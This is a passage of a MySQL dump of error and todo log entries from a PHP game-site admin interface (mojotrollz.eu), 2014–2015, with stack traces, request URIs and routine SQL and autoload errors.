`http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (437, 'Exception', 'Cron edit, delete', 'dbf99d94e14f45608633ea2a3e8576a858d68b4d', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Cron edit, dele...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.012, '2014-12-12 03:25:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Cron%20edit,%20delete', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (438, 'SYSTEM\\LOG\\TODO', '', 'da39a3ee5e6b4b0d3255bfef95601890afd80709', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php', 9, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__SYSTEM_SAI_saimod_sys_cron()\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.02, '2014-12-12 03:40:49', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (439, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\\"SYSTEM\\LOG\\CRON\\" ORDER BY time DESC LIMIT 1\' at line 1', 'cb9835a5d2d3b8d93334814b622c0a4ab07369b0', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT time FRO...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT time FRO...\')\n#2 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(26): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/system/cron/cron.php(57): SYSTEM\\DB\\QQ::Q1()\n#4 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php(8): SYSTEM\\CRON\\cron::last_visit()\n#5 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__SYSTEM_SAI_saimod_sys_cron()\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#8 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#9 {main}', '37.24.148.242', 0.016, '2014-12-12 03:42:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (440, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\\LOG\\CRON ORDER BY time DESC LIMIT 1\' at line 1', '20b4df27b8b3afe2fa2de571a1b11404b7718379', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT time FRO...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT time FRO...\')\n#2 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(26): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/system/cron/cron.php(57): SYSTEM\\DB\\QQ::Q1()\n#4 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php(8): SYSTEM\\CRON\\cron::last_visit()\n#5 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__SYSTEM_SAI_saimod_sys_cron()\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#8 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#9 {main}', '37.24.148.242', 0.016, '2014-12-12 03:44:03', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (441, 'SYSTEM\\LOG\\ERROR', 'Class not found: SYSTEM\\CRON\\INFO', '1780c9bae25d31c27f01b197cb88be9f1a1e4bde', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'SYSTEM\\\\CRON\\\\INF...\')\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(57): spl_autoload_call(\'SYSTEM\\\\CRON\\\\INF...\')\n#2 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php(8): SYSTEM\\CRON\\cron::last_visit()\n#3 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__SYSTEM_SAI_saimod_sys_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.012, '2014-12-12 03:48:58', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (443, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 3; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=type_list&table=1', '1e86f3d04cf0be3610d34d908605d08cba4ed4da', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.008, '2014-12-12 22:42:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=type_list&table=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (908, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: filter Verifier: UINT', '6e3ee7702c1b44c5f4a5d3ef484e0169e56038ba', 1, '/home/mojotrolls/mojo_zero/src/web/system/api/api.php', 183, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(43): SYSTEM\\API\\api::do_parameters_opt(Array, Array, 220, \'undefined\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/mojotrolls/mojo_zero/src/web/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/mojotrolls/mojo_zero/src/web/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.146.242', 0.028, '2015-04-11 19:24:43', 'mojotrollz.eu', 80, '/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=undefined&filter=undefined&db=undefined', 'a:0:{}', 'http://mojotrollz.eu/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36', 10, b'0', 0, 2, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (814, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'type\' in \'where clause\'', '09edfb5bfad98ee1465aee174fe243f5bdf82004', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TAGS_GET_VA...\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TAGS_GET_VA...\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php(37): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(57): tags::get_value(1, 1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature()\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.028, '2014-12-21 20:49:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (442, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 6; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=type_editadd&id=&table=1&name=&description=', '6d63003ae390f133cab7d9813e0fdfd83ff34471', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.012, '2014-12-12 04:35:11', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=type_editadd&id=&table=1&name=&description=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (444, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'table = ? and id = ?\' at line 1', 'a167ad9709c3b35b2d0c51eede5c07e511c28614', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\DB_TAGS_TYP...\', \'DELETE FROM moj...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\DB_TAGS_TYP...\', \'DELETE FROM moj...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(29): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php(18): SYSTEM\\DB\\QP::QI(Array)\n#4 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags_action_type_del(\'1\', \'1\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.036, '2014-12-12 23:02:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=type_del&id=1&table=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (445, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'table\' in \'where clause\'', 'c0d0dca2ddef9915b56466b77a0b18ebcda69365', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\DB_TAGS_VAL...\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\DB_TAGS_VAL...\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php(24): SYSTEM\\DB\\QP::QQ(Array)\n#3 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags_action_value_list(\'1\', \'1\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.012, '2014-12-21 20:50:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=value_list&id=1&table=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (446, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: type Verifier: INT', 'bdcbbe97cd388e0ef68f8c053f9191e40559b828', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 5400, \'value_list\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.008, '2014-12-12 23:10:23', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=value_list&type=undefined', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (447, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\DB_TAGS_VALUE_INSERTUPDATE', '5669487dbb43092eb75a180717efd2502363458d', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\DB_TAGS_VAL...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php(12): spl_autoload_call(\'DBD\\\\DB_TAGS_VAL...\')\n#2 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags_action_value_add(\'1\', \'0\', \'undefined\', \'\')\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.012, '2014-12-12 23:24:56', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=value_add&id=0&type=1&value=undefined&description=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (448, 'ERROR', 'Could not delete Value.', 'db9f304a8e7cb1d417a485201cbabbb57da4a9d7', 1, '/home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_tags/saimod_mojotrollz_db_tags.php', 18, '#0 [internal function]: saimod_mojotrollz_db_tags::sai_mod_saimod_mojotrollz_db_tags_action_value_del(\'1\', \'0\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.032, '2014-12-12 23:28:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=value_del&id=0&type=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (449, 'SYSTEM\\LOG\\ERROR', 'Class not found: map', 'f1128941413e80511ce6a61d5587e0c15eff068c', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'map\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_player/saimod_mojotrollz_db_player.php(11): spl_autoload_call(\'map\')\n#2 [internal function]: saimod_mojotrollz_db_player::sai_mod_saimod_mojotrollz_db_player()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.012, '2014-12-12 23:54:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_player', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (450, 'Exception', 'Player linkable, map', '40b3bc14e326a02ba42b9f1ba9e9ee317e8fec4d', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Player linkable...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 01:09:03', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Player%20linkable,%20map', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (712, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_parry.png\' found.', 'd3d34d86bed50f6281eeb042bf1ca9e75b2c6bdf', 1, '/home/mojotrolls/mojo_zero/src/web/system/files/files.php', 22, '#0 /home/mojotrolls/mojo_zero/src/web/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_parry.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_parry.p...\')\n#2 /home/mojotrolls/mojo_zero/src/web/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/mojotrolls/mojo_zero/src/web/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '87.60.112.108', 0.036, '2014-12-14 18:43:32', 'www.mojotrollz.eu', 80, 